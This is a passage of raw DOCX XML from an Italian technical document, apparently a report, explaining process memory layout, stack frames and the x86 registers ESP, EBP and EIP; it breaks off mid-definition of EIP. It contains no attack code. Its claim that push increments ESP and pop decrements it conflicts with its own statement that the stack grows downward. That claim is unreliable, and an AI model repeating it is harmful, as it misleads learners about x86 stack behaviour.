        <w:t>Anatomia della memoria</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="54BDA50F" w14:textId="53E28BB0" w:rsidR="00980488" w:rsidRDefault="00980488" w:rsidP="00980488">
      <w:pPr>
        <w:pStyle w:val="NormaleWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00980488">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Quando viene eseguito un programma il sistema operativo normalmente genera un nuovo processo e alloca in memoria centrale uno spazio di memoria virtuale riservato al processo stesso.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00980488">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Questo spazio di memoria in generale ha una struttura data da (partendo dall’alto verso il basso):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A934D2C" w14:textId="77777777" w:rsidR="00980488" w:rsidRPr="00980488" w:rsidRDefault="00980488" w:rsidP="00980488">
      <w:pPr>
        <w:pStyle w:val="NormaleWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68F7BD8D" w14:textId="20044E81" w:rsidR="00980488" w:rsidRDefault="00980488" w:rsidP="00980488">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:color w:val="202122"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07653705" wp14:editId="014D94AB">
            <wp:extent cx="4106983" cy="3212123"/>
            <wp:effectExtent l="0" t="0" r="8255"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6983" cy="3212123"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="410387D1" w14:textId="77777777" w:rsidR="00980488" w:rsidRDefault="00980488" w:rsidP="00980488">
      <w:pPr>
        <w:pStyle w:val="NormaleWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kernel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7E3AD0" w14:textId="77777777" w:rsidR="00980488" w:rsidRDefault="00980488" w:rsidP="00980488">
      <w:pPr>
        <w:pStyle w:val="NormaleWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Stack (cresce verso il basso)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A307E4" w14:textId="77777777" w:rsidR="00980488" w:rsidRDefault="00980488" w:rsidP="00980488">
      <w:pPr>
        <w:pStyle w:val="NormaleWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Heap (cresce verso l’alto)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517296DC" w14:textId="77777777" w:rsidR="00980488" w:rsidRDefault="00980488" w:rsidP="00980488">
      <w:pPr>
        <w:pStyle w:val="NormaleWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Dati liberi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE4942A" w14:textId="52302217" w:rsidR="00D614D9" w:rsidRPr="00F85D48" w:rsidRDefault="00980488" w:rsidP="00D614D9">
      <w:pPr>
        <w:pStyle w:val="NormaleWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Codice del programma</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0B0C56" w14:textId="5C950F54" w:rsidR="00980488" w:rsidRDefault="00D614D9" w:rsidP="00980488">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>In particolare, analizzeremo meglio il contenuto dello Stack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5D9ED8" w14:textId="21AED7EC" w:rsidR="00D614D9" w:rsidRPr="003441B6" w:rsidRDefault="00D614D9" w:rsidP="003441B6">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc76047758"/>
      <w:r w:rsidRPr="003441B6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2 </w:t>
      </w:r>
      <w:r w:rsidRPr="003441B6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Anatomia Stack</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="4B9E4E14" w14:textId="701D8352" w:rsidR="00D614D9" w:rsidRDefault="00D614D9" w:rsidP="00D614D9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="202122"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D614D9">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">L’esecuzione di un programma consiste, a sua volta, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D614D9">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="202122"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>di diverse chiamate a funzioni: ciascuna chiamata genera uno stack frame all’interno dello stack (che man mano cresce verso il basso nella struttura descritta sopra, con politica </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:tooltip="LIFO" w:history="1">
        <w:r w:rsidRPr="00D614D9">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:rFonts w:cstheme="minorHAnsi"/>
            <w:color w:val="0645AD"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>LIFO</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D614D9">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="202122"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>); all’interno del frame la funzione chiamata memorizza le variabili locali, l’indirizzo dell’istruzione della funzione chiamante a cui dovrà restituire il controllo (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D614D9">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="202122"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D614D9">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="202122"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D614D9">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="202122"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D614D9">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="202122"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>) e il puntatore al frame della funzione chiamante; questi ultimi due in particolare giocano un ruolo fondamentale nell’assicurare il giusto flusso di esecuzione al programma fra una chiamata di funzione e l’altra, infatti:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203FB938" w14:textId="77777777" w:rsidR="00F85D48" w:rsidRPr="00F85D48" w:rsidRDefault="00F85D48" w:rsidP="00F85D48">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="24" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F85D48">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">Il </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F85D48">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F85D48">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F85D48">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t>address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F85D48">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> dice alla funzione chiamata a quale istruzione della funzione chiamante </w:t>
      </w:r>
      <w:r w:rsidRPr="00F85D48">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t>bisogna restituire il controllo;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D79F4D0" w14:textId="02A30765" w:rsidR="00F85D48" w:rsidRDefault="00F85D48" w:rsidP="00980488">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="24" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F85D48">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t>Il puntatore al frame della funzione chiamante consente di ripristinare il suo contesto di esecuzione prima di restituirle il controllo;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435F624B" w14:textId="77777777" w:rsidR="00F85D48" w:rsidRDefault="00F85D48">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="104A04B3" w14:textId="5308B689" w:rsidR="00D614D9" w:rsidRDefault="00F85D48" w:rsidP="00F85D48">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="24" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:color w:val="202122"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A4FE4C6" wp14:editId="6722DA4F">
            <wp:extent cx="6120130" cy="2640330"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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20130" cy="2640330"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="104F8B60" w14:textId="3228A83E" w:rsidR="00F85D48" w:rsidRDefault="00F85D48" w:rsidP="00F85D48">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="24" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="202122"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F85D48">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="202122"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t>Lo stack present</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="202122"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00682B3B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="202122"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t>diversi elementi interessanti. Oltre allo spazio del buffer, in cui verranno conservati i dati, sono presenti alcuni registri:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140197BF" w14:textId="4CA58636" w:rsidR="00682B3B" w:rsidRPr="00682B3B" w:rsidRDefault="00682B3B" w:rsidP="00682B3B">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="24" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="202122"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00682B3B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="202122"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">ESP (Extended Stack Pointer): Nelle architetture x86 l’ESP è un registro dedicato </w:t>
      </w:r>
      <w:r w:rsidRPr="00682B3B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="202122"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>che contiene l'indirizzo della locazione di memoria occupata dal top dello </w:t>
      </w:r>
      <w:r w:rsidRPr="00682B3B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>stack</w:t>
      </w:r>
      <w:r w:rsidRPr="00682B3B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="202122"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> per permetterne le operazioni di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00682B3B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="202122"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>push</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00682B3B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="202122"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>, che lo incrementerà, e di pop, che farà l'inverso, per permettere le operazioni che implicano l'uso dello stack che seguono la logica LIFO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="202122"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051AB231" w14:textId="1E64BEAF" w:rsidR="00682B3B" w:rsidRPr="00682B3B" w:rsidRDefault="00682B3B" w:rsidP="005302B2">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="24" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="202122"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="202122"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">EBP (Extended </w:t>
      </w:r>
      <w:r w:rsidRPr="00682B3B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="202122"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">Base Pointer): </w:t>
      </w:r>
      <w:r w:rsidRPr="00682B3B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="202122"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>il registro dedicato EBP</w:t>
      </w:r>
      <w:r w:rsidR="002C4137">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="202122"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00682B3B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="202122"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> chiamato anche frame pointer o base pointer</w:t>
      </w:r>
      <w:r w:rsidR="002C4137">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="202122"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00682B3B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="202122"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>punta, per tutta la durata della procedura, alla prima locazione di memoria del record di attivazione in modo che si possa far riferimento al top dello stack in maniera relativa ad essa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B395A4E" w14:textId="2A0675C7" w:rsidR="00682B3B" w:rsidRPr="009B09DC" w:rsidRDefault="00682B3B" w:rsidP="005302B2">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="24" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="202122"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C4137">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="202122"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">EIP (Extended </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C4137">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="202122"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t>Instruction</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C4137">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="202122"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pointer)</w:t>
      </w:r>
      <w:r w:rsidR="002C4137" w:rsidRPr="002C4137">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="202122"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="002C4137" w:rsidRPr="002C4137">
        <w:rPr>
